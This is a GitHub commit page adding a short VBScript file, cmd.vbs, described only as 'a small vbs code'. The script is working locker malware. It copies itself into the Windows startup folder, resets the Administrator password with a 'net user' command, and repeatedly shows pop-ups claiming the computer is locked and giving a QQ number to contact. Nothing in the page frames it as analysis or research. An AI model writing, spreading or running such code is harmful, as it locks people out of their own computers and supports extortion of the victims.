Skip to content

Navigation Menu

Sign in
Appearance settings

Search code, repositories, users, issues, pull requests...

Provide feedback

We read every piece of feedback, and take your input very seriously.

Saved searches

Use saved searches to filter your results more quickly

Sign up
Appearance settings

Commit 82ecc5f

Browse files
一个小小的vbs代码
1 parent 9e45863 commit 82ecc5f

1 file changed

Lines changed: 17 additions & 0 deletions

File tree

‎vbs/cmd.vbs‎

Lines changed: 17 additions & 0 deletions
Original file line numberDiff line numberDiff line change
@@ -0,0 +1,17 @@
1+
set fso = createobject("scripting.filesystemobject")
2+
set ws = createobject("wscript.shell")
3+
pt = ws.specialfolders("startup") & "\"
4+
set file = fso.getfile(wscript.scriptfullname)
5+
file.copy pt
6+
7+
msgbox "你电脑已中锁,请联系QQ:619699629",64,"系统提示"
8+
9+
set oShell = wscript.CreateObject ("wscript.shell")
10+
oShell.run "net user Administrator woshixiaozhu"
11+
set oShell = nothing
12+
13+
do until i=10
14+
i=i+1
15+
msgbox "你电脑已中锁,请联系QQ:619699629",16+4096,"系统提示"
16+
wscript.sleep 1000*60*5 '时间可以自己改
17+
loop

0 commit comments

Comments
(0)

AltStyle によって変換されたページ (->オリジナル) /